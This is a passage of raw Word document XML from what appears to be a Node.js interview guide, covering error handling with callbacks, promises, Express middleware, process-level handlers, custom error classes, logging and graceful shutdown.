          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Q47. How does Node.js handle errors, and what are some common error-handling techniques in Node.js?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="49"/>
    </w:p>
    <w:p w14:paraId="5BAB0DE3"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Error Handling in Node.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C40A64A"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1. Error Objects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67384324" w14:textId="77777777" w:rsidR="00E52823" w:rsidRPr="00DA2F32" w:rsidRDefault="00E52823" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="106"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Error Object</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: The Error object in JavaScript is used to represent errors. It contains properties like name, message, and stack that provide information about the error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C58792D"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error = new Error('Something went wrong!');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192D9582"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console.log(error.message); // 'Something went wrong!'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CD4DE8"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console.log(error.stack);  // Stack trace</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5332812A"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2. Error Handling in Callbacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539217D3" w14:textId="77777777" w:rsidR="00E52823" w:rsidRPr="00DA2F32" w:rsidRDefault="00E52823" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="107"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Callback Functions</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: In asynchronous functions that use callbacks, errors are usually passed as the first argument. This is known as the "error-first callback" pattern.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB8A8E4"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43340D1E"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EE80D04"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fs.readFile('file.txt', 'utf8', (err, data) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6748397A"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if (err) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D1F428"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reading file:', err);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09907F85"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0778D4C1"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186B5DF"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console.log(data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FC09F8"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B1766C1"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3. Error Handling with Promises</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCDD706" w14:textId="77777777" w:rsidR="00E52823" w:rsidRPr="00DA2F32" w:rsidRDefault="00E52823" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="108"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Promises</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Errors in Promises are handled using .catch() method or try...catch with async/await.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181DD7AF"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Using .catch()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE81A08"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someAsyncFunction()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223B8D5C"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.then(result =&gt; console.log(result))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61AABDD7"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.catch(error =&gt; console.error('Error:', error));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E41BC84"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AEA04DE"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Using async/await</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC9AEA9"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someFunction() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3E6689"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try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F040C8"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result = await someAsyncFunction();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F1F62D"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console.log(result);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727DD4B1"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(error) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60557AEB"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error);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A596382"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24B5FC5"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0A5F7D7"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4. Error Handling in Express</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A219C76" w14:textId="77777777" w:rsidR="00E52823" w:rsidRPr="00DA2F32" w:rsidRDefault="00E52823" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="109"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Express Middleware</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: In Express applications, you can handle errors using custom error-handling middleware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1048252B"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3AC6AB74"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72AC49E5"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69BBE57"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 (req, res) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE1FC07"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throw new Error('Something went wrong!');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8E6C04"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1D29643"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36DB8D1D"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1FC16648"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console.error(err.stack);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597D9C57"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res.status(500).send('Something broke!');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E39AAF"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0B206B0"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38B762FB"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app.listen(3000, () =&gt; console.log('Server running on port 3000'));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5D173D"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5. Handling Uncaught Exceptions and Unhandled Rejections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04517A1F" w14:textId="77777777" w:rsidR="00E52823" w:rsidRPr="00DA2F32" w:rsidRDefault="00E52823" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="110"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Uncaught Exceptions</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Use the process.on('uncaughtException', callback) event to catch exceptions that were not handled elsewhere.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7454DC1C"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process.on('uncaughtException', (err) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768D20FE"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console.error('Uncaught Exception:', err);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F37B62C"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 // Exit the process after handling the error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3754803D"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FC87E39" w14:textId="77777777" w:rsidR="00E52823" w:rsidRPr="00DA2F32" w:rsidRDefault="00E52823" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="110"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Unhandled Rejections</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Use process.on('unhandledRejection', callback) to catch unhandled promise rejections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6CA236"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process.on('unhandledRejection', (reason, promise) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3197B2CE"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console.error('Unhandled Rejection:', reason);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B363BA"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40596B6"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6. Custom Error Classes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55738A2D" w14:textId="77777777" w:rsidR="00E52823" w:rsidRPr="00DA2F32" w:rsidRDefault="00E52823" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="111"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Custom Error Classes</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Create custom error classes by extending the base Error class. This can help in differentiating types of errors and handling them appropriately.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1303DC" w14:textId="77777777" w:rsidR="00E52823" w:rsidRPr="00DA2F32" w:rsidRDefault="00E5282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CustomError extends Error {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4387BD4D" w14:textId="77777777" w:rsidR="00E52823" w:rsidRPr="00DA2F32" w:rsidRDefault="00E5282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constructor(message) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49761D85" w14:textId="77777777" w:rsidR="00E52823" w:rsidRPr="00DA2F32" w:rsidRDefault="00E5282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super(message);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53575C65" w14:textId="77777777" w:rsidR="00E52823" w:rsidRPr="00DA2F32" w:rsidRDefault="00E5282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this.name = 'CustomError';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598069CE" w14:textId="77777777" w:rsidR="00E52823" w:rsidRPr="00DA2F32" w:rsidRDefault="00E5282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E67D8E2" w14:textId="77777777" w:rsidR="00E52823" w:rsidRPr="00DA2F32" w:rsidRDefault="00E5282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0F80FCB" w14:textId="77777777" w:rsidR="00E52823" w:rsidRPr="00DA2F32" w:rsidRDefault="00E5282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rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2782D9B5" w14:textId="77777777" w:rsidR="00E52823" w:rsidRPr="00DA2F32" w:rsidRDefault="00E52823" w:rsidP="009E0607">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>throw new CustomError('This is a custom error');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E6AB00"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7. Error Logging and Monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693B0C51" w14:textId="77777777" w:rsidR="00E52823" w:rsidRPr="00DA2F32" w:rsidRDefault="00E52823" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="112"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Logging</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Use logging libraries like winston or morgan to record error details for debugging and monitoring.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D728484"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winston = require('winston');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D52B32A"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58B02BCC"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logger = winston.createLogger({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798D0D45"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level: 'error',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3342F9F1"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format: winston.format.json(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7B5F5B"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transports: [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3705E081"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new winston.transports.File({ filename: 'error.log' })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77828269"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4D1F645"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5E1A648"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1CB5039B"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try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675816EA"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throw new Error('Something went wrong!');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39740565"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catch (error) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32FFCD3B"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logger.error(error.message, { stack: error.stack });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A712C99"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2C8AD19" w14:textId="77777777" w:rsidR="00E52823" w:rsidRPr="00DA2F32" w:rsidRDefault="00E52823" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="112"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Monitoring</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Use APM tools like New Relic, Datadog, or Sentry to monitor and alert on application errors in real-time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A53E71"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8. Graceful Shutdown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49597541" w14:textId="77777777" w:rsidR="00E52823" w:rsidRPr="00DA2F32" w:rsidRDefault="00E52823" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="113"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Graceful Shutdown</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Handle errors during application shutdown to ensure that the application exits cleanly and resources are properly released.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178B4A4E"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process.on('SIGTERM', () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55AE5E03"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console.log('SIGTERM signal received.');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D598477"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server.close(() =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3B87E0"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console.log('HTTP server closed.');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD84A29"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process.exit(0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A1B9B2"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75DC159" w14:textId="77777777" w:rsidR="00E52823" w:rsidRPr="00DA2F32" w:rsidRDefault="00E5282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2CF4B72" w14:textId="77777777" w:rsidR="00E52823" w:rsidRPr="00DA2F32" w:rsidRDefault="00E52823" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158E45A2" w14:textId="77777777" w:rsidR="00E52823" w:rsidRPr="00DA2F32" w:rsidRDefault="00E52823" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="114"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Error Objects</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Use JavaScript’s Error object to represent and handle errors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E121D04" w14:textId="77777777" w:rsidR="00E52823" w:rsidRPr="00DA2F32" w:rsidRDefault="00E52823" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="114"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Callback Errors</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Follow the "error-first callback" pattern for asynchronous functions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67EFC8AA" w14:textId="77777777" w:rsidR="00E52823" w:rsidRPr="00DA2F32" w:rsidRDefault="00E52823" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="114"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Promises</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Use .catch() or try...catch with async/await for handling promise rejections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F21405" w14:textId="77777777" w:rsidR="00E52823" w:rsidRPr="00DA2F32" w:rsidRDefault="00E52823" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="114"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Express Middleware</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Use custom error-handling middleware in Express applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F70419" w14:textId="77777777" w:rsidR="00E52823" w:rsidRPr="00DA2F32" w:rsidRDefault="00E52823" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="114"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Uncaught Exceptions/Unhandled Rejections</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Handle global exceptions and promise rejections to avoid process crashes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7064E55B" w14:textId="77777777" w:rsidR="00E52823" w:rsidRPr="00DA2F32" w:rsidRDefault="00E52823" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="114"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Custom Errors</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Define custom error classes for more precise error handling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69BFCFB0" w14:textId="77777777" w:rsidR="00E52823" w:rsidRPr="00DA2F32" w:rsidRDefault="00E52823" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="114"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
